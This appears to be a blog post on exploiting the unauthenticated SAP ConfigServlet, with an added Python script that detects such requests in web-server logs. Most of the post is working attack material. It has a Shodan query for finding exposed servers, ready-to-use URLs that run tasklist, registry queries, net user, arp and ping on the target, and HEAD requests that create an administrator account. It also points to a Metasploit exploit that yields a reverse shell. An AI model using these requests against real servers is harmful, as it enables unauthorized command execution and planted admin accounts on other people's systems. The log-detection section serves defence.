SAP is the most popular business application suite: more than 180,000 customers worldwide run it.
Companies like Nike, Coca-Cola and Sony work with SAP systems.
In this post, we are going to talk about how these weaknesses can be exploited.
First of all, we need to locate potentially vulnerable SAP servers. As usual, we are going to use Shodan.
http://www.shodanhq.com/search?q=%2Firj%2Fportal+50000
Then, we can execute commands on the SAP server through the web browser using the following URL queries, without authentication.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=tasklist
We can see the running processes on the server.
We can see/edit the Windows Server Registry.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=reg query hkcu\console\
We can see the network interfaces.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig /all
We can run a traceroute in order to discover the network where the SAP server is hosted.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=tracert www.google.com
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=net user
We can show its ARP table.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=arp%20-a
We can even ping servers on the same network.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ping%2010.100.8.221
Another great discovery is that an administrator SAP user can be created via HEAD requests...
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla
HEAD /ctc/ConfigServlet?para=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=blabla,GROUPNAME=Administrators
On 2013-04-25 Andras Kabai published an exploit. You can run it with Metasploit, upload a payload, get a reverse shell and take control of the SAP server.
You can download the exploit called "SAP ConfigServlet Remote Unauthenticated Payload Execution" here: http://www.exploit-db.com/exploits/24996/
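From the defensive side, every request shown above goes through the ConfigServlet with a `param` value that names the handler and the action (EXECUTE_CMD, CREATEUSER, ADD_USER_TO_GROUP), so they are easy to spot in web-server access logs. The following detection script is an added example, not code from the original post; it assumes common-log-format lines (the sample log is constructed here) and flags any request to the ConfigServlet paths, decoding the action and its arguments:

```python
import re
from urllib.parse import unquote

# Paths and action names taken from the request URLs quoted in the post above.
CTC_PATHS = ("/ctc/servlet/com.sap.ctc.util.ConfigServlet", "/ctc/ConfigServlet")
RISKY_ACTIONS = {"EXECUTE_CMD", "CREATEUSER", "ADD_USER_TO_GROUP"}

# Common log format: src ident user [time] "METHOD target proto" status size
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def _query_params(query):
    """Split a raw query string on '&' only; values may themselves contain '=' and ';'."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[key] = unquote(value)  # arp%20-a -> 'arp -a'
    return params

def classify_request(target):
    """Return a finding dict for a ConfigServlet request, or None for anything else."""
    path, _, query = target.partition("?")
    if not path.startswith(CTC_PATHS):
        return None
    params = _query_params(query)
    # the post's second HEAD request spells the key 'para'; accept both
    fields = (params.get("param") or params.get("para") or "").split(";")
    action = fields[1] if len(fields) > 1 else ""
    return {"handler": fields[0], "action": action,
            "detail": ";".join(fields[2:]), "risky": action in RISKY_ACTIONS}

def scan_log(lines):
    """Return one finding per ConfigServlet request found in the log lines."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        hit = classify_request(m.group("target")) if m else None
        if hit:
            findings.append({"src": m.group("src"), "method": m.group("method"),
                             "status": int(m.group("status")), **hit})
    return findings

# Constructed sample log: one benign portal hit, then requests shaped like those in the post.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Apr/2013:10:01:02 +0000] "GET /irj/portal HTTP/1.1" 200 5120
203.0.113.5 - - [25/Apr/2013:10:01:09 +0000] "GET /ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=arp%20-a HTTP/1.1" 200 311
203.0.113.5 - - [25/Apr/2013:10:01:15 +0000] "HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla HTTP/1.1" 200 0
203.0.113.5 - - [25/Apr/2013:10:01:16 +0000] "HEAD /ctc/ConfigServlet?para=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=blabla,GROUPNAME=Administrators HTTP/1.1" 200 0
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f)
```

Note that HEAD requests return no body, so a 200 with size 0 against /ctc is not evidence that the action failed; treat any unauthenticated reach of these paths as a finding and restrict or patch the servlet per SAP's guidance.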
Finally, you can see the original document here.